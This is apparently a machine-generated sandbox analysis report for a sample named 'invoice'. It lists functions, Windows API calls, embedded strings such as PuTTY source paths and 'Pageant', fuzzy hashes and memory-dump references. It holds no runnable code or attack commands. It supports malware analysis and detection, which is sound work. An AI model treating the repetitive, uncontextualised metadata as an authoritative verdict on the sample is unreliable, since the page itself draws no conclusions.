Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 99dda32fbde3bfa6594a0666c4e775303a44697f1dc5f99ea83ea134b92af984
Instruction ID: 797b982afaad4e5c2636b193bf54602ff744072ab36c91fc5bd1cbb1a0204628
Opcode Fuzzy Hash: 99dda32fbde3bfa6594a0666c4e775303a44697f1dc5f99ea83ea134b92af984
Instruction Fuzzy Hash: E3319536604F809AEB60DF65E8447DE73A4F784754F540139EA9D43BA5EF38C246CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCA0FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 000000013FDCA1A7
GetLastError.KERNEL32 ref: 000000013FDCA1CF

Strings

Error %d: %s, xrefs: 000000013FDCA1ED
(unable to format: FormatMessage returned %u), xrefs: 000000013FDCA1D5

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
API String ID: 3479602957-1777221902
Opcode ID: 85e91efd32b44ccb3dc8ec16ad7d36b31dba0b26bb347c62a14086f7fe9acbbe
Instruction ID: e7b54dea2c9300e3dd45e8bda4daf98030761df9d7ad8dcdfe9fc44b36cba926
Opcode Fuzzy Hash: 85e91efd32b44ccb3dc8ec16ad7d36b31dba0b26bb347c62a14086f7fe9acbbe
Instruction Fuzzy Hash: DA318131A156458AFB60EB55E8693DA73A0E785784F404039EA8D87BA5EB7CCB478B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCD99F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32 ref: 000000013FDCD9CB
FindClose.KERNEL32 ref: 000000013FDCD9E5
FindWindowA.USER32 ref: 000000013FDCD9F9

Strings

Pageant, xrefs: 000000013FDCD9EF

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Find$CloseFileFirstWindow
String ID: Pageant
API String ID: 2475344593-3220706369
Opcode ID: e52c129b0ea1a77535ae8c6844c765294487a4d8a4812c87e6a84c762b154c8d
Instruction ID: 75cb429db1ab089d1fb1fa09d67124383b1fbc9274fa7af57a37b5abb14d34a7
Opcode Fuzzy Hash: e52c129b0ea1a77535ae8c6844c765294487a4d8a4812c87e6a84c762b154c8d
Instruction Fuzzy Hash: 90F0C834B0564055FD21B755FC193DA63505755BF0F4543399C6E077E8EE2CC687C600

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD684FE Relevance: 6.7, Strings: 5, Instructions: 443COMMON

Download Yara Rule

Strings

@, xrefs: 000000013FD685D5
!mp_eq_integer(d, 0), xrefs: 000000013FD68562
!mp_cmp_hs(remainder, d), xrefs: 000000013FD68A8F
../mpint.c, xrefs: 000000013FD68569, 000000013FD68A96
@, xrefs: 000000013FD685CA

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: !mp_cmp_hs(remainder, d)$!mp_eq_integer(d, 0)$../mpint.c$@$@
API String ID: 0-1283535917
Opcode ID: 0a2578c1f1d4284ef6468b69cdfc412615b6e6ea977ad3b512f76b8d164c5bc7
Instruction ID: 8b04d739718990da3c1fecfd881926978d290fa3938289a0c7586ed093e2bbb3
Opcode Fuzzy Hash: 0a2578c1f1d4284ef6468b69cdfc412615b6e6ea977ad3b512f76b8d164c5bc7
Instruction Fuzzy Hash: CDF116B2B01A8486EE04DB62E9593DD6351A785BE4F84D239EE5D5BBD9DE3CC243C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD66E41 Relevance: 6.6, Strings: 5, Instructions: 392COMMON

Download Yara Rule

Strings

len <= pool->nw, xrefs: 000000013FD66F1D, 000000013FD66FA2, 000000013FD67097, 000000013FD6711E, 000000013FD67187, 000000013FD67307
p > 0, xrefs: 000000013FD66EB3
x->nw > 0, xrefs: 000000013FD66E72
../mpint.c, xrefs: 000000013FD66E79, 000000013FD66E9C, 000000013FD66EBA, 000000013FD66F24, 000000013FD66FA9, 000000013FD6709E, 000000013FD67125, 000000013FD6718E, 000000013FD6730E
x->w[0] & 1, xrefs: 000000013FD66E95

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _set_error_mode
String ID: ../mpint.c$len <= pool->nw$p > 0$x->nw > 0$x->w[0] & 1
API String ID: 1949149715-1397136461
Opcode ID: 9a6a019d9c6b24bf572bcfde3a21f2fb5a1b08e47e843ea8a40992c2b7e3b73c
Instruction ID: 5f547955a43108c6342f4c8e2df243ddd4dba315eedc1f7c87f60364efca5685
Opcode Fuzzy Hash: 9a6a019d9c6b24bf572bcfde3a21f2fb5a1b08e47e843ea8a40992c2b7e3b73c
Instruction Fuzzy Hash: E402A032714AC885DB60DF55E9443DA7365F788BE4F84863AEA9D07BA8DF38C246C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC826C Relevance: 6.1, APIs: 4, Instructions: 78threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 000000013FDC82CC
CreateEventA.KERNEL32 ref: 000000013FDC82DC
CreateThread.KERNEL32 ref: 000000013FDC834C
CloseHandle.KERNEL32 ref: 000000013FDC835A

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Create$Event$CloseHandleThread
String ID:
API String ID: 855482634-0
Opcode ID: b47cee86df02d7081404416e3736ac4ed9f09cc7e92f48a16475bb66754511b4
Instruction ID: b399f95a8241b434b6c686344b3099f128bdfadcd2643d52a978850e567750d2
Opcode Fuzzy Hash: b47cee86df02d7081404416e3736ac4ed9f09cc7e92f48a16475bb66754511b4
Instruction Fuzzy Hash: CE21D532611A404AFB54DF66F855B9A7795F788B90F85803D9E8E47BA0EF3CD642C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC7FC0 Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,000000013FDCDC72), ref: 000000013FDC801B
CreateEventA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,000000013FDCDC72), ref: 000000013FDC802B
CreateThread.KERNEL32 ref: 000000013FDC8094
CloseHandle.KERNEL32 ref: 000000013FDC80A2

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Create$Event$CloseHandleThread
String ID:
API String ID: 855482634-0
Opcode ID: 82afccd1c8db0166d4abca6efa8bca00bcf1eae965271b72602afb4189897222
Instruction ID: 033f7404b4c4f6e657eb5b3312e234d219ec5ec5046569d22df0917b9475d9a5
Opcode Fuzzy Hash: 82afccd1c8db0166d4abca6efa8bca00bcf1eae965271b72602afb4189897222
Instruction Fuzzy Hash: 0C21E632600A404AFB24DB65BC15BCA77A1F789B84F85803D9E8E47B91DF3CD2428700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE8DE4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE8E48

Strings

gfffffff, xrefs: 000000013FDE90DD

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: 9bd7b6851a3832662511b7b4b7da35fb4cfc901bcccc3f33c253d702296aa209
Instruction ID: d5cc841c76d2bd8bd90bd79a07b6d02c7e55fde7a9d05803561d765d0e14ed7f
Opcode Fuzzy Hash: 9bd7b6851a3832662511b7b4b7da35fb4cfc901bcccc3f33c253d702296aa209
Instruction Fuzzy Hash: 35913573B057C486EB12CF6AE5183ED6BA5A760BC4F098136DA8D47791EA3EC607C341

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD92C0 Relevance: 4.8, APIs: 3, Instructions: 331COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2ea8c8bb86805236277821c739cbe42dd7ccfb5b8e9116b999367a68b5117ea
Instruction ID: 8647b36d3a4527436f175962a0292b0c7095e386b03535b1e366d4af8274a1fb
Opcode Fuzzy Hash: f2ea8c8bb86805236277821c739cbe42dd7ccfb5b8e9116b999367a68b5117ea
Instruction Fuzzy Hash: D3C1D672B1468487DB70CF59E18879AB7A1F798784F448239EB4B47B84D73ADA42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDAAC00 Relevance: 4.3, Strings: 3, Instructions: 502COMMON

Download Yara Rule

Strings

0 <= p && p < width, xrefs: 000000013FDAB3ED
../terminal.c, xrefs: 000000013FDAB101, 000000013FDAB3F4
opos == term->cols, xrefs: 000000013FDAB0FA

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: ../terminal.c$0 <= p && p < width$opos == term->cols
API String ID: 0-50079099
Opcode ID: 4c4c3386a4f28c0934df541ecae12cc6552c8390a78feda751e046a74ced6d7c
Instruction ID: ca182bebc0aa1488695edf2ee570579ae2c8781c467bf9f176be2c1aba31720b
Opcode Fuzzy Hash: 4c4c3386a4f28c0934df541ecae12cc6552c8390a78feda751e046a74ced6d7c
Instruction Fuzzy Hash: 14328D72A00B98C6EB54DF59C1887DE37A8FB48BC0F46422AEF5947395DB34CA86C344

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDF6F68 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 000000013FDF71B7
RaiseException.KERNEL32 ref: 000000013FDF71C8

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: f78e41a0210553723ec9dc906520ccac935c720d91df496ec54b75b8ac51e20d
Instruction ID: d238492bb51bf92f70058b5f120cafb6f715e073514b494f9be2f5675279e986
Opcode Fuzzy Hash: f78e41a0210553723ec9dc906520ccac935c720d91df496ec54b75b8ac51e20d
Instruction Fuzzy Hash: 7BB14C77A00B888BEB15CF6DC88A79C77B0F344B58F158926EA5987BA4CB35C556C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD5F890 Relevance: 3.0, Strings: 2, Instructions: 466COMMON

Download Yara Rule

Strings

../ldisc.c, xrefs: 000000013FD5F8B9
ldisc->term, xrefs: 000000013FD5F8B2

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _set_error_mode
String ID: ../ldisc.c$ldisc->term
API String ID: 1949149715-2095201438
Opcode ID: e67f47ced32c41b2663ddf13fb83829a9cc4c6f3888c43ceb689d45b04eade90
Instruction ID: c0660c6ded46ed78bd19a5c583c60c501e399530a1d1873e316781d872372b74
Opcode Fuzzy Hash: e67f47ced32c41b2663ddf13fb83829a9cc4c6f3888c43ceb689d45b04eade90
Instruction Fuzzy Hash: 2B126036B00A44D6EB64CA5AC19C3AD27A1F389B94F14852ACF4D8FB91CF35D6A7C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD66502 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

scratch.nw >= mp_mul_scratchspace_unary(inlen), xrefs: 000000013FD66557
../mpint.c, xrefs: 000000013FD6655E

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _set_error_mode
String ID: ../mpint.c$scratch.nw >= mp_mul_scratchspace_unary(inlen)
API String ID: 1949149715-2876103257
Opcode ID: 04a262d944018c6c837da11510a9c9407267badff098e4bcfe7e3b220185f809
Instruction ID: ee9b3a7f2926dfce3860e02d0ceaa7f39dfc8352cb5337987fdc227511620bb3
Opcode Fuzzy Hash: 04a262d944018c6c837da11510a9c9407267badff098e4bcfe7e3b220185f809
Instruction Fuzzy Hash: A002AD72B15AD484EA20CFA5E5587DAB361F758BD4F898136DE8D0BB58EF38C246C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD9964F Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

0123456789, xrefs: 000000013FD997A8, 000000013FD997F4, 000000013FD99838
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/=, xrefs: 000000013FD998C9

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: 0123456789$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/=
API String ID: 0-1071417609
Opcode ID: aa8ecb0cb9f5efe3c8c10613bf90cc840c65722f974c12f52f21af7d1169cc0a
Instruction ID: 7e2cb4a24db9659133c437cbb08f421ab5366e0241715044bc434785c859fae7
Opcode Fuzzy Hash: aa8ecb0cb9f5efe3c8c10613bf90cc840c65722f974c12f52f21af7d1169cc0a
Instruction Fuzzy Hash: 63819F31A0468592FF349BA6E1493EE6363FB85788F40912ADADE1B656DF3CD247C301

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDF39FC Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 000000013FDF3A60

Part of subcall function 000000013FDDFA20: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDDFA34

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo
String ID:
API String ID: 474895018-0
Opcode ID: 3763b3749c65421f1cdaa035914df91241e0ca4537019d1e32cab506b5855252
Instruction ID: 3613ac4e172de7e149a55f4b14aa4bfc92320ebc78aae34d31d73a6e5987e345
Opcode Fuzzy Hash: 3763b3749c65421f1cdaa035914df91241e0ca4537019d1e32cab506b5855252
Instruction Fuzzy Hash: 4A912A32F0438046F7748AA9D458BEDB691F780764F5A423DDAA987FD5D738CA4B8700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCD6E1 Relevance: 1.5, APIs: 1, Instructions: 39pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32 ref: 000000013FDCD750

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 203709b4f74dea35915f954e9a3d463cf1a924aafa715890bb9e6a5f320a289d
Instruction ID: 652002408cb55218bfc44f290163613dea699182bd63e47521e4bb96bd96cd76
Opcode Fuzzy Hash: 203709b4f74dea35915f954e9a3d463cf1a924aafa715890bb9e6a5f320a289d
Instruction Fuzzy Hash: CB01B932614B4487E760DF15F49035ABBA0F788B60F918339EAAD47794DB3CC281CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD0EDC Relevance: 1.5, APIs: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,?,000000013FD601E6), ref: 000000013FDD0EFC

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: af162bd7b635644edfd38c2bc042767fe9a70f59c8d0e82f94610a0b48325369
Instruction ID: f191c04c1ed4301161cec0cc70fcbac6146839f30e8bc16d783f888832882c15
Opcode Fuzzy Hash: af162bd7b635644edfd38c2bc042767fe9a70f59c8d0e82f94610a0b48325369
Instruction Fuzzy Hash: 5C017532A14A4486D725DB39A551669B3A0FB89780F508226BB8D53655EB3CD252CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC8A74 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 000000013FDC8A9E

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
